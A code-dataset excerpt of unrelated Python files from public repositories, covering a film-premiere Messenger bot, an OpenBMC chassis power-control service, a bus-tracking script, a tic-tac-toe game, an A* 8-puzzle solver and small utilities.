f_info = {\n 'title': settings.uncd(movie['title']),\n 'subtitle': description,\n 'buttons': [\n {\n 'type': 'postback',\n 'title': 'Сеансы',\n 'payload': 'seances{}'.format(movie[my_id])\n }\n ]\n }\n else:\n f_info = {\n 'title': settings.uncd(movie['title']),\n 'image_url': poster,\n 'subtitle': description,\n 'buttons': [\n {\n 'type': 'postback',\n 'title': 'Сеансы',\n 'payload': 'seances{}num{}'.format(movie[my_id], 0)\n },\n {\n 'type': 'web_url',\n 'url': trailer_url,\n 'title': 'Трейлер'\n },\n {\n 'type': 'postback',\n 'title': 'Подробнее',\n 'payload': 'info{}'.format(movie[my_id])\n },\n\n ]\n }\n\n return f_info\n\n\ndef _construct_out_of_films_payload(recipient_id, movies):\n if len(movies) > 0:\n\n quick_replies = [\n {\n 'content_type': 'text',\n 'title': 'В начало',\n 'payload': '/premiere{}'.format(\n settings.FB_FILMS_TO_DISPLAY\n )\n }\n ]\n payload = construct_message_with_attachment(\n recipient_id, movies, quick_replies\n )\n else:\n text = settings.NO_MORE_FILMS\n quick_replies = [\n {\n 'content_type': 'text',\n 'title': 'В начало',\n 'payload': '/premiere{}'.format(\n settings.FB_FILMS_TO_DISPLAY\n )\n }\n ]\n payload = construct_message_with_text(\n recipient_id, text, quick_replies\n )\n return payload\n\n\ndef display_premieres(recipient_id, number_of_movies):\n\n url = settings.URL_PREMIERES.format(\n settings.KINOHOD_API_KEY\n )\n html_data = get_data(url)\n videos = []\n for film_counter in xrange(number_of_movies - settings.FB_FILMS_TO_DISPLAY,\n number_of_movies):\n if film_counter < len(html_data):\n movie = html_data[film_counter]\n genres_str = poster = trailer_url = ''\n if 'genres' in movie:\n genres_str = ', '.join([g for g in movie['genres']])\n description = 'Жанр: {}'.decode('utf-8').format(genres_str)\n if 'poster' in movie:\n poster = get_movie_poster(movie['poster'])\n if ('trailers' in movie and\n isinstance(movie['trailers'], list) and\n len(html_data) > 0 and 'mobile_mp4' in\n movie['trailers'][0]):\n trailer_url = (movie['trailers'][0]\n ['mobile_mp4']['filename'])\n trailer_url = get_movie_trailer_link(trailer_url)\n f_info = _construct_film_info(\n poster, description, trailer_url, movie\n )\n\n videos.append(f_info)\n\n else:\n movies = videos\n payload = json.dumps(\n _construct_out_of_films_payload(\n recipient_id, movies\n )\n )\n return payload\n\n movies = videos[0:10]\n payload = json.dumps(\n _construct_final_payload(\n recipient_id, movies, number_of_movies +\n settings.FB_FILMS_TO_DISPLAY\n )\n )\n return payload\n","repo_name":"KNIGHTTH0R/TelegramBot","sub_path":"fb_bot/display_premieres.py","file_name":"display_premieres.py","file_ext":"py","file_size_in_byte":4623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"11569284452","text":"#!/usr/bin/env python\n\n# TODO: openbmc/openbmc#2994 remove python 2 support\ntry: # python 2\n import gobject\nexcept ImportError: # python 3\n from gi.repository import GObject as gobject\n\nimport dbus\nimport dbus.mainloop.glib\nimport dbus.service\nfrom obmc.dbuslib.bindings import DbusObjectManager, DbusProperties, get_dbus\n\nDBUS_NAME = \"org.openbmc.control.Chassis\"\nOBJ_NAME = \"/org/openbmc/control/chassis0\"\nCONTROL_INTF = \"org.openbmc.Control\"\n\nMACHINE_ID = \"/etc/machine-id\"\n\nPOWER_OFF = 0\nPOWER_ON = 1\n\nBOOTED = 100\n\n\nclass ChassisControlObject(DbusProperties, DbusObjectManager):\n def getUuid(self):\n uuid = \"\"\n try:\n with open(MACHINE_ID) as f:\n data = f.readline().rstrip(\"\\n\")\n if len(data) == 32:\n uuid = data\n else:\n print(\"ERROR: UUID is not formatted correctly: \" + data)\n except Exception:\n print(\"ERROR: Unable to open uuid file: \" + MACHINE_ID)\n\n return uuid\n\n def __init__(self, bus, name):\n super(ChassisControlObject, self).__init__(conn=bus, object_path=name)\n # load utilized objects\n self.dbus_objects = {\n \"power_control\": {\n \"bus_name\": \"org.openbmc.control.Power\",\n \"object_name\": \"/org/openbmc/control/power0\",\n \"interface_name\": \"org.openbmc.control.Power\",\n },\n \"host_services\": {\n \"bus_name\": \"org.openbmc.HostServices\",\n \"object_name\": \"/org/openbmc/HostServices\",\n \"interface_name\": \"org.openbmc.HostServices\",\n },\n \"systemd\": {\n \"bus_name\": \"org.freedesktop.systemd1\",\n \"object_name\": \"/org/freedesktop/systemd1\",\n \"interface_name\": \"org.freedesktop.systemd1.Manager\",\n },\n }\n\n # uuid\n self.Set(DBUS_NAME, \"uuid\", self.getUuid())\n self.Set(DBUS_NAME, \"reboot\", 0)\n\n bus.add_signal_receiver(\n self.power_button_signal_handler,\n dbus_interface=\"org.openbmc.Button\",\n signal_name=\"Released\",\n path=\"/org/openbmc/buttons/power0\",\n )\n bus.add_signal_receiver(\n self.long_power_button_signal_handler,\n dbus_interface=\"org.openbmc.Button\",\n signal_name=\"PressedLong\",\n path=\"/org/openbmc/buttons/power0\",\n )\n bus.add_signal_receiver(\n self.softreset_button_signal_handler,\n dbus_interface=\"org.openbmc.Button\",\n signal_name=\"Released\",\n path=\"/org/openbmc/buttons/reset0\",\n )\n\n bus.add_signal_receiver(\n self.host_watchdog_signal_handler,\n dbus_interface=\"org.openbmc.Watchdog\",\n signal_name=\"WatchdogError\",\n )\n\n def getInterface(self, name):\n o = self.dbus_objects[name]\n obj = bus.get_object(o[\"bus_name\"], o[\"object_name\"], introspect=False)\n return dbus.Interface(obj, o[\"interface_name\"])\n\n @dbus.service.method(DBUS_NAME, in_signature=\"\", out_signature=\"\")\n def powerOn(self):\n print(\"Turn on power and boot\")\n self.Set(DBUS_NAME, \"reboot\", 0)\n intf = self.getInterface(\"systemd\")\n f = getattr(intf, \"StartUnit\")\n f.call_async(\"obmc-host-start@0.target\", \"replace\")\n return None\n\n @dbus.service.method(DBUS_NAME, in_signature=\"\", out_signature=\"\")\n def powerOff(self):\n print(\"Turn off power\")\n intf = self.getInterface(\"systemd\")\n f = getattr(intf, \"StartUnit\")\n f.call_async(\"obmc-chassis-hard-poweroff@0.target\", \"replace\")\n return None\n\n @dbus.service.method(DBUS_NAME, in_signature=\"\", out_signature=\"\")\n def softPowerOff(self):\n print(\"Soft off power\")\n intf = self.getInterface(\"systemd\")\n f = getattr(intf, \"StartUnit\")\n f.call_async(\"obmc-host-shutdown@0.target\", \"replace\")\n return None\n\n @dbus.service.method(DBUS_NAME, in_signature=\"\", out_signature=\"\")\n def reboot(self):\n print(\"Rebooting\")\n if self.getPowerState() != POWER_OFF:\n self.Set(DBUS_NAME, \"reboot\", 1)\n self.powerOff()\n return None\n\n @dbus.service.method(DBUS_NAME, in_signature=\"\", out_signature=\"\")\n def softReboot(self):\n print(\"Soft Rebooting\")\n if self.getPowerState() != POWER_OFF:\n self.Set(DBUS_NAME, \"reboot\", 1)\n self.softPowerOff()\n return None\n\n @dbus.service.method(DBUS_NAME, in_signature=\"\", out_signature=\"\")\n def quiesce(self):\n intf = self.getInterface(\"systemd\")\n f = getattr(intf, \"StartUnit\")\n f.call_async(\"obmc-host-quiesce@0.target\", \"replace\")\n return None\n\n @dbus.service.method(DBUS_NAME, in_signature=\"\", out_signature=\"i\")\n def getPowerState(self):\n intf = self.getInterface(\"power_control\")\n return intf.getPowerState()\n\n # Signal handler\n\n def power_button_signal_handler(self):\n # toggle power, power-on / soft-power-off\n state = self.getPowerState()\n if state == POWER_OFF:\n self.powerOn()\n elif state == POWER_ON:\n self.softPowerOff()\n\n def long_power_button_signal_handler(self):\n print(\"Long-press button, hard power off\")\n self.powerOff()\n\n def softreset_button_signal_handler(self):\n self.softReboot()\n\n def host_watchdog_signal_handler(self):\n print(\"Watchdog Error, Going to quiesce\")\n self.quiesce()\n\n\nif __name__ == \"__main__\":\n dbus.mainloop.glib.DBusGMainLoop(set_as_default=True)\n\n bus = get_dbus()\n obj = ChassisControlObject(bus, OBJ_NAME)\n mainloop = gobject.MainLoop()\n\n obj.unmask_signals()\n name = dbus.service.BusName(DBUS_NAME, bus)\n\n print(\"Running ChassisControlService\")\n mainloop.run()\n\n# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4\n","repo_name":"openbmc/skeleton","sub_path":"pychassisctl/chassis_control.py","file_name":"chassis_control.py","file_ext":"py","file_size_in_byte":5953,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"3"} +{"seq_id":"25350843185","text":"def get_color(type_edge, weight):\n # Задаем цвета в RGB формате для разных типов отношений\n colors = {\n 'друзья': (0, 255, 0), # Зеленый\n 'партнеры': (10, 186, 181), # Тиффани\n 'романтик': (255, 0, 0), # Красный\n 'негатив': (0, 0, 255) # Синий\n }\n\n if type_edge in colors:\n rgb = colors[type_edge]\n rgb = tuple(int((1 - weight) * 255 + weight * i) for i in rgb)\n hex_color = '#{:02x}{:02x}{:02x}'.format(*rgb)\n return hex_color\n else:\n return '#000000' # цвет если не указали тип\n\n\nprint(get_color('романтик', 0.9))\n","repo_name":"barsik2/graphviz","sub_path":"server/app/getColor.py","file_name":"getColor.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"36049295823","text":"from __future__ import print_function\nimport json\nimport urllib2\nimport os\nimport sys\n\nurl = \"http://bustime.mta.info/api/siri/vehicle-monitoring.json?key=\" + sys.argv[1] + \"&VehicleMonitoringDetailLevel=calls&LineRef=\" + sys.argv[2]\n\nresponse = urllib2.urlopen(url)\ndata = response.read().decode(\"utf-8\")\ndata = json.loads(data)\n\nposition = data['Siri']['ServiceDelivery']['VehicleMonitoringDelivery'][0]['VehicleActivity']\n\nbusline = 'Bus line : ' + sys.argv[2]\nnumberofbuses = len(position)\nprint (busline)\nprint ('Number of Active Buses :', numberofbuses)\na = 0\nfor i in position:\n latitude = i['MonitoredVehicleJourney']['VehicleLocation']['Latitude']\n longitude = i['MonitoredVehicleJourney']['VehicleLocation']['Longitude']\n print ('Bus', a, 'is at latitude', latitude, 'and longitude', longitude)\n a = a + 1\n","repo_name":"wbx200/PUI2016_wbx200","sub_path":"HW2_wbx200/show_bus_locations_wbx200.py","file_name":"show_bus_locations_wbx200.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"73956572882","text":"\r\nimport pygame\r\n\r\npygame.init()\r\n\r\nsw = 800\r\nsh = 600\r\n\r\nboard = pygame.image.load(r'C:\\Users\\Dinesh Topale\\Downloads\\board.jpg')\r\nx_img = pygame.image.load(r'C:\\Users\\Dinesh Topale\\Downloads\\x.png')\r\no_img = pygame.image.load(r'C:\\Users\\Dinesh Topale\\Downloads\\o.png')\r\n\r\nwin = pygame.display.set_mode((sw, sh))\r\n\r\nclock = pygame.time.Clock()\r\n\r\nboardVals = [[0,0,0], [0,0,0], [0,0,0]]\r\n\r\npiecesOnBoard = []\r\n\r\nmoveCount = 0\r\n\r\ngameOver = False\r\n\r\nisTwoPlayer = True\r\n\r\nclass Piece(object):\r\n def __init__(self, x, y, isX):\r\n self.x = x\r\n self.y = y\r\n self.isX = isX\r\n self.xTrue = self.x - (self.x % 200)\r\n self.yTrue = self.y - (self.y % 200)\r\n if isX:\r\n self.image = x_img\r\n else:\r\n self.image = o_img\r\n\r\n def draw(self, win):\r\n\r\n win.blit(self.image, (self.xTrue, self.yTrue))\r\n\r\n\r\ndef redrawGameWindow():\r\n win.blit(board, (0,0))\r\n pygame.draw.rect(win, (0,0,0), [600, 0, 200, 600])\r\n font = pygame.font.SysFont('arial', 50)\r\n smallFont = pygame.font.SysFont('arial', 25)\r\n if moveCount % 2 == 0:\r\n turn = 'X'\r\n else:\r\n turn = 'O'\r\n turnText = font.render(turn + \"'s Turn\", 1, (255, 255, 255))\r\n win.blit(turnText, (sw - turnText.get_width() -10, 10))\r\n\r\n if gameOver is True:\r\n gameOverText = smallFont.render(\"Game Over\", 1, (255, 255, 255))\r\n win.blit(gameOverText, (sw - gameOverText.get_width() - 35, 20 + turnText.get_height()))\r\n\r\n for piece in piecesOnBoard:\r\n piece.draw(win)\r\n\r\n\r\n pygame.display.update()\r\n\r\ndef isGameOver(boardVals):\r\n zeroFound = False\r\n for i in boardVals:\r\n for j in i:\r\n if j == 0:\r\n zeroFound = True\r\n if not zeroFound:\r\n return True\r\n\r\n # Horizonal Win\r\n for i in boardVals:\r\n if i[0] == i[1] and i[0] == i[2] and i[0] != 0:\r\n return True\r\n\r\n # Vertical Win\r\n if boardVals[0][0] == boardVals[1][0] and boardVals[0][0] == boardVals[2][0]:\r\n if boardVals[0][0] != 0:\r\n return True\r\n if boardVals[0][1] == boardVals[1][1] and boardVals[0][1] == boardVals[2][1]:\r\n if boardVals[0][1] != 0:\r\n return True\r\n if boardVals[0][2] == boardVals[1][2] and boardVals[0][2] == boardVals[2][2]:\r\n if boardVals[0][2] != 0:\r\n return True\r\n\r\n #Diagonal Check\r\n if boardVals[0][0] == boardVals[1][1] and boardVals[0][0] == boardVals[2][2]:\r\n if boardVals[0][0] != 0:\r\n return True\r\n\r\n if boardVals[0][2] == boardVals[1][1] and boardVals[0][2] == boardVals[2][0]:\r\n if boardVals[0][2] != 0: # Change boardVals[0][0] to boardVals[0][2]\r\n return True\r\n\r\n # Add return false\r\n return False\r\n\r\nrun = True\r\nwhile run:\r\n clock.tick(10)\r\n\r\n if not gameOver:\r\n mouseX, mouseY = pygame.mouse.get_pos()\r\n click = pygame.mouse.get_pressed()\r\n if isTwoPlayer:\r\n if click != (0,0,0):\r\n if moveCount % 2 == 0:\r\n if boardVals[mouseY//200][mouseX//200] == 0:\r\n piecesOnBoard.append(Piece(mouseX, mouseY, True))\r\n boardVals[mouseY//200][mouseX//200] = 1\r\n moveCount += 1\r\n else:\r\n if boardVals[mouseY // 200][mouseX // 200] == 0:\r\n piecesOnBoard.append(Piece(mouseX, mouseY, False))\r\n boardVals[mouseY // 200][mouseX // 200] = -1\r\n moveCount += 1\r\n\r\n gameOver = isGameOver(boardVals)\r\n else:\r\n if moveCount % 2 == 0:\r\n if click != (0, 0, 0):\r\n if boardVals[mouseY // 200][mouseX // 200] == 0:\r\n piecesOnBoard.append(Piece(mouseX, mouseY, True))\r\n boardVals[mouseY // 200][mouseX // 200] = 1\r\n moveCount += 1\r\n print(boardVals)\r\n \r\n \r\n\r\n\r\n keys = pygame.key.get_pressed()\r\n if keys[pygame.K_SPACE]:\r\n boardVals = [[0,0,0], [0,0,0], [0,0,0]]\r\n piecesOnBoard.clear()\r\n moveCount = 0\r\n gameOver = False\r\n if keys[pygame.K_1]:\r\n isTwoPlayer = False\r\n if keys[pygame.K_2]:\r\n isTwoPlayer = True\r\n\r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n run = False\r\n\r\n redrawGameWindow()\r\n\r\n\r\npygame.quit()","repo_name":"thenewcomer-coder/New-tic-tac-toe-game","sub_path":"Tic Tac Toe game.py","file_name":"Tic Tac Toe game.py","file_ext":"py","file_size_in_byte":4459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42491988385","text":"import random\n\n\nCOLUMN_SYNONYMS = {\n \"identifier\": [\"client id\", \"number\", \"unique id\"],\n \"full_name\": [\"name\", \"full name\", \"client name\", \"client\"],\n \"first_name\": [\n \"first name\",\n \"given name\",\n ],\n \"last_name\": [\"family name\", \"surname\", \"last name\"],\n \"sex\": [\"gender\"],\n \"birth_date\": [\n \"date of birth\",\n \"birthdate\",\n ],\n \"birth_year\": [\"year of birth\", \"birthyear\"],\n \"age\": [],\n \"visit_date\": [\"visit date\", \"date of visit\", \"date\"],\n \"entry_date\": [\"entry date\", \"date of entry\"],\n \"clinical_variable\": [\"hiv\", \"via\", \"hiv status\", \"via status\"],\n}\n\n\nclass ColumnSynonym(object):\n def __init__(self):\n self.ref2syn = dict((k, [k] + v) for k, v in COLUMN_SYNONYMS.items())\n self.cap_styles = [\"lower\", \"upper\", \"capitalize\", \"title\"]\n\n def style(self):\n return random.choice(self.cap_styles)\n\n def rename(self, ref_col, cap_type=None, syn_option=None):\n syn = self.ref2syn[ref_col]\n if syn_option is None:\n col = random.choice(self.ref2syn[ref_col])\n else:\n i = min(len(syn) - 1, syn_option)\n col = syn[i]\n if cap_type is None:\n cap_type = random.choice([0, 1, 2])\n else:\n if type(cap_type) is not int:\n cap_type = self.cap_styles.index(cap_type)\n if cap_type == 0:\n col = col.lower()\n elif cap_type == 1:\n col = col.upper()\n elif cap_type == 2:\n col = col.capitalize()\n else:\n col = col.title()\n return col\n","repo_name":"ersilia-os/cidrz-e2e-linkage","sub_path":"e2elink/synthetic/schema/default.py","file_name":"default.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"17386595154","text":"import sqlite3\nfrom flask import Flask, g\nfrom contextlib import closing\n\nfrom flask_login import LoginManager\nfrom flask_sqlalchemy import SQLAlchemy\n\napp = Flask(__name__)\napp.config.from_object('config')\napp.config.setdefault('SQLALCHEMY_TRACK_MODIFICATIONS', True)\napp.jinja_env.add_extension('jinja2.ext.loopcontrols')\n\ndb = SQLAlchemy(app)\n\ndef connect_db():\n return sqlite3.connect(app.config['DATABASE'])\n\ndef init_db():\n with closing(connect_db()) as db:\n with app.open_resource('schema.sql', mode='r') as f:\n db.cursor().executescript(f.read())\n db.commit()\n\n@app.before_request\ndef before_request():\n g.db = connect_db()\n\n@app.teardown_request\ndef teardown_request(exception):\n db = getattr(g, 'db', None)\n if db is not None:\n db.close()\n g.db.close()\n\nlm = LoginManager()\nlm.init_app(app)\nlm.login_view = 'login'\n\nfrom bbs import views, userAction, postAction, filters","repo_name":"vaseline555/Blockchain-based-Electronic-Lab-Notebook","sub_path":"src/frontend/bbs/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"25864764826","text":"def iterPrime(num):\n '''\n iterates through the num to find largest factor\n '''\n x = 3\n answer = 0\n while num-x != 0:\n if float(num)/x == float(num/x):\n num/=x\n answer = num\n else:\n x+=2\n return answer","repo_name":"DanielAndrews43/Project-Euler","sub_path":"Problem 003.py","file_name":"Problem 003.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"73425116240","text":"from constraint import *\n\np = Problem()\n\nvariables = set(\"BB\") | set(\"I\") | set(\"ILL\")\np.addVariables(variables, range(0,10))\n\np.addVariable(\"X1\", [0,1])\n\np.addConstraint(lambda B,I,L,X1: B+I == L+10*X1, ('B','I','L','X1'))\np.addConstraint(lambda B,X1,L,I: B+X1 == L+10*I, ('B','X1','L','I'))\np.addConstraint(AllDifferentConstraint(), variables)\n\nsols = p.getSolutions()\n\nfor sol in sols:\n print(\"Possible solution:\")\n for var in sorted(variables):\n print(var, \"=\", sol[var])\n print()\n","repo_name":"ngffy/artificial-intelligence-hw","sub_path":"HW2/problem2.py","file_name":"problem2.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7955834356","text":"from priorityqueue import Priority_Queue\nimport math\n\ndef nextState(aState):\n \"\"\"return the availavel state\"\"\"\n state = aState.st\n #find the moveable piece\n for i in range(3):\n for j in range(3):\n if state[i][j] == 0:\n blankX = i\n blankY = j\n break\n # index 0 index 1 index 2 index 3\n #assigning number to each possible state, so it won't go back\n nextS = [(blankX+1,blankY,1),(blankX-1,blankY,0),(blankX,blankY-1,3),(blankX,blankY+1,2)]\n \n #remember where it comes from, and delete the state which may go back to previouse state\n if aState.ls != 4:\n del nextS[aState.ls]\n\n validS = []\n #check whether or not the reamining state is valid,make sure it won't move out\n for item in nextS:\n if (item[0] >= 0 and item[0] < 3) and (item[1] >= 0 and item[1] < 3):\n tempS = list(map(list,state))\n x = state[item[0]][item[1]]\n tempS[blankX][blankY] = x\n tempS[item[0]][item[1]] = 0\n #if if valid, creat the object and append it into the list\n validS.append(State(aState.key, list(map(list,tempS)), item[2], aState.step+1))\n\n return validS\n\n\ndef hFrist(validS):\n global goal\n \"\"\"hamming distance heuristic\"\"\"\n for itemState in validS:\n item = itemState.st\n misplaced = 0\n for i in range(3):\n for j in range(3):\n if item[i][j] != goal[i][j]:\n misplaced += 1\n itemState.key = (itemState.step + misplaced)\n return validS\n\ndef hSecond(validS):\n global goal\n \"\"\"manhattan distance heuristic\n \"\"\"\n for itemState in validS:\n item = itemState.st\n step = 0\n for i in range(3):\n for j in range(3):\n k = item[i][j]\n for x in range(3):\n for y in range(3):\n if goal[x][y] == k:\n step += (abs(x-i) + abs(y-j))\n #the mistate make in hSecond, causes a lot of more work\n #step += abs(((x-i) + (y-j)))\n itemState.key = (step + itemState.step)\n \n return validS\n\ndef hThird(validS):\n \"\"\"heuristic thiree, take the acutual distance as cose function, with diagnose, we don't use \n a + b, insted the cost become sqt(a**2 + b**2)\n \"\"\"\n for itemState in validS:\n item = itemState.st\n step = 0\n for i in range(3):\n for j in range(3):\n k = item[i][j]\n for x in range(3):\n for y in range(3):\n if goal[x][y] == k:\n \"\"\"the search cost is less, but it's not the optimal one\"\"\"\n #admissible heuristic, \n #step += ((abs(x-i))**2 + (abs(y-j))**2)\n\n #this one is better than heuristic one but worse than heuristic two\n step += math.sqrt((abs(x-i))**2 + (abs(y-j))**2)\n\n itemState.key = (step + itemState.step)\n \n return validS\n\ndef nextMove(state, first = False):\n \"\"\"combine the state function and heuristic funtion\n the frist deteminte whether run the first heuristic or second\n \"\"\"\n nextS = nextState(state)\n if first:\n return hFrist(nextS)\n else:\n return hSecond(nextS)\n\n\nclass State:\n def __init__(self, k,st,last, step):\n \"\"\"this State has 4 arrtibues\n key stands for the heuristic cost + the step cost\n st stands for the puzzle's state\n ls stands for how does it changed from last state, either top,down,right or left.\n step stands for the step cost from the start state to current state\n \"\"\"\n self.key = k\n self.st = st\n self.ls = last\n self.step = step\n\n def precede(self, x):\n return self.key < x.key # do not use <= or >=\n\n def assign(self, v): # v must be of higher priority value than the current key\n x = State(v, self.st, self.ls,self.step) # x is a local temporary instance\n if not self.precede(x):\n self.key = v\n return True\n else:\n return False\n\ndef showPuzzle(arr):\n \"\"\"a function to print the puzzle nicely\"\"\"\n for i in range(3):\n for j in range(3):\n print(str(arr[i][j]) + \" \", end='')\n print()\n\nprint(\"1,2,3\\n4,5,6\\n7,8,0\\n-------\")\nstart = []\ngoal = []\n\n#obtaining the start state\nfor i in range(3):\n temp = input().split(',')\n start.append([int(temp[0]), int(temp[1]), int(temp[2])])\n\n#obtaining the goal state\nfor i in range(3):\n temp = input().split(',')\n goal.append([int(temp[0]), int(temp[1]), int(temp[2])])\n\nstartS = State(0, start,4,0)\n\npq = Priority_Queue()\npq.enqueue(startS)\n\npath = {}\nfinalState = None\n\ncount = 0\nwhile pq:\n current = pq.dequeue()\n count += 1\n if current.st == goal:\n finalState = current\n print(\"The total cost is \" + str(current.step))\n #showPuzzle(current.st)\n break\n else:\n #print(\"The cost is \" + str(current.step))\n #showPuzzle(current.st)\n nextS = nextMove(current)\n for item in nextS:\n pq.enqueue(item)\n #remebering where it comes from and store it as a dictonary\n path[item] = current\n\nprint(\"total search is \" + str(count))\n\n\ncurrent = finalState\nret = []\nret.append(goal)\ncount = 0\n# get the puzzle from goal back to the start\nwhile current.st != start:\n current = path[current]\n ret.append(current.st)\n count += 1\n if count == 100000:\n print(\"wrong\")\n\n# print the puzzle from start to goal\ncount = 0\nfor i in range(len(ret)-1, -1, -1):\n print(\"\\nstep \" + str(count) + \" is:\")\n count += 1\n showPuzzle(ret[i])\n\n \n\n\n\n\n","repo_name":"finbaar/Astar","sub_path":"Astar.py","file_name":"Astar.py","file_ext":"py","file_size_in_byte":5903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31324894554","text":"from Consistent_cRoot import *\n\nfrom decimal import Decimal, getcontext\nfrom random import randint\n\n\n# This function tests various things, what inputs are necessary to produce imaginary roots with negative real parts,\n# the main purpose, though is to figure out under what conditions is 2ad - bc/3 + bM4/3 + bM5/3 negative or positive\ndef P2_sw(switch_num):\n if switch_num < 5:\n return 1\n elif switch_num > 8 or switch_num < 1:\n print(f\"No combination #{switch_num} defaulting to 1\")\n return 1\n else:\n return -1\n\ndef P3_sw(switch_num):\n if switch_num > 8 or switch_num < 1:\n print(f\"No combination #{switch_num} defaulting to 1\")\n return 1\n else:\n if (switch_num - 1) % 4 < 2:\n return 1\n else:\n return -1 \n \ndef P5_sw(switch_num):\n if switch_num > 8 or switch_num < 1:\n print(f\"No combination #{switch_num} defaulting to 1\")\n return 1\n else:\n if switch_num % 2 == 1:\n return 1\n else:\n return -1 \n\ndef getM4(A, B, C, D, E):\n M1 = Decimal(72*A*C*E - 27*A*D*D - 27*B**2*E + 9*B*C*D - 2*C**3)\n\n M2 = Decimal(12*A*E - 3*B*D + C*C)\n\n M6_real, M6_imag =c_square_root(M1*M1 - 4*M2*M2*M2, Decimal(\"0\"))\n\n input_r, input_i = Decimal(M1/2 + M6_real/2), Decimal(M6_imag/2)\n if abs(input_r) < 1e-26:\n input_r = Decimal(0)\n if abs(input_i) < 1e-26:\n input_i = Decimal(0)\n M4_real, M4_imag =c_cube_root(input_r, input_i)\n return 2*M4_real\n\ndef test_p2p5(A, B, C, D, E, Debug=False, switch=1):\n\n\n M1 = Decimal(72*A*C*E - 27*A*D*D - 27*B**2*E + 9*B*C*D - 2*C**3)\n\n M2 = Decimal(12*A*E - 3*B*D + C*C)\n\n M6_real, M6_imag =c_square_root(M1*M1 - 4*M2*M2*M2, Decimal(\"0\"))\n if Debug:\n print(M1*M1 - 4*M2*M2*M2, Decimal(\"0\"))\n print(M6_real**2 - M6_imag**2)\n input()\n\n input_r, input_i = Decimal(M1/2 + M6_real/2), Decimal(M6_imag/2)\n if abs(input_r) < 1e-26:\n input_r = Decimal(0)\n if abs(input_i) < 1e-26:\n input_i = Decimal(0)\n M4_real, M4_imag =c_cube_root(input_r, input_i)\n if Debug:\n print(input_r, input_i)\n print(M4_real**3 - 3*M4_real*M4_imag**2, 3*M4_real**2*M4_imag - M4_imag**3)\n input()\n\n \n\n if (6*A*D - B*C + 2*B*M4_real) > 0:\n return 1\n elif (6*A*D - B*C + 2*B*M4_real) == 0:\n return 0\n else:\n return -1\n # if (M4_real ) < 0:\n # return -1\n # elif M4_real > 1:\n # return 1\n # else:\n # return 0\n\ndef func(a, b, c, d, e, x_real, x_imag):\n output_real = Decimal(a*x_real**4 - 6*a*x_real**2*x_imag**2 + a*x_imag**4)\n output_imag = Decimal(4*a*x_real**3*x_imag - 4*a*x_real*x_imag**3)\n\n\n output_real += Decimal(b*x_real**3 - 3*b*x_real*x_imag**2)\n output_imag += Decimal(3*b*x_real**2*x_imag - b*x_imag**3)\n\n\n output_real += Decimal(c*x_real**2 - c*x_imag**2)\n output_imag += Decimal(2*c*x_real*x_imag)\n\n\n output_real += Decimal(d*x_real)\n output_imag += Decimal(d*x_imag)\n\n\n output_real += Decimal(e)\n\n\n\n\n return output_real, output_imag\n\n\ndef makeDecimal(a,b,c,d,e):\n A = Decimal(a)\n if A == 0:\n A = Decimal(1)\n B = Decimal(b)\n C = Decimal(c)\n D = Decimal(d)\n E = Decimal(e)\n return A, B, C, D, E\n\n\n\nTest = True\nif Test == True:\n Fd = False\n for i in range(400):\n # stopped at 57697\n a,b,c,d,e = randint(-10, 10), randint(-10, 10), randint(-10, 10), randint(-10, 10), randint(-10, 10)\n if a == 0:\n a = 1\n a,b,c,d,e = makeDecimal(a,b,c,d,e)\n\n\n passed = test_p2p5(a,b,c,d,e)\n if passed == 1 and a*d**2 > e*b**2:\n print(f\"{a} {b} {c} {d} {e}\")\n print(f\"{a*d*d} {b*b*e}\")\n print(f\"{b*c - 6*a*d}\")\n M4 = getM4(a, b, c, d, e)\n print(M4)\n break\n \n\n \n \n\n\n\n","repo_name":"EloMalakhi/Polynomialic-formulas","sub_path":"Tester.py","file_name":"Tester.py","file_ext":"py","file_size_in_byte":3892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38542960864","text":"# static analysis: ignore\n\"\"\"Base classes for building the models used by the package.\"\"\"\n\n# Future imports\nfrom __future__ import (\n annotations,\n)\n\n# Standard library imports\nimport abc\nfrom typing import (\n Mapping,\n)\n\n# Third party imports\nimport pydantic\n\n# Local imports\nimport submanager.models.utils\nfrom submanager.models.types import (\n ItemIDStr,\n StripStr,\n)\n\n\nclass CustomBaseModel(\n pydantic.BaseModel,\n validate_all=True,\n extra=pydantic.Extra.forbid,\n allow_mutation=False,\n validate_assignment=True,\n metaclass=abc.ABCMeta,\n):\n \"\"\"Locally-customized Pydantic BaseModel.\"\"\"\n\n\nclass CustomMutableBaseModel(\n CustomBaseModel,\n allow_mutation=True,\n metaclass=abc.ABCMeta,\n):\n \"\"\"Custom BaseModel that allows mutation.\"\"\"\n\n\nclass ItemConfig(CustomBaseModel, metaclass=abc.ABCMeta):\n \"\"\"Base class for an atomic unit in the config hierarchy.\"\"\"\n\n description: pydantic.StrictStr = \"\"\n enabled: bool = True\n uid: ItemIDStr\n\n\nclass ContextConfig(CustomBaseModel):\n \"\"\"Local context configuration for the bot.\"\"\"\n\n account: StripStr\n subreddit: StripStr\n\n @pydantic.validator(\"account\", pre=True)\n def check_account_found( # pylint: disable = no-self-use, no-self-argument\n cls,\n value: submanager.models.utils.MissingAccount | str,\n ) -> str:\n 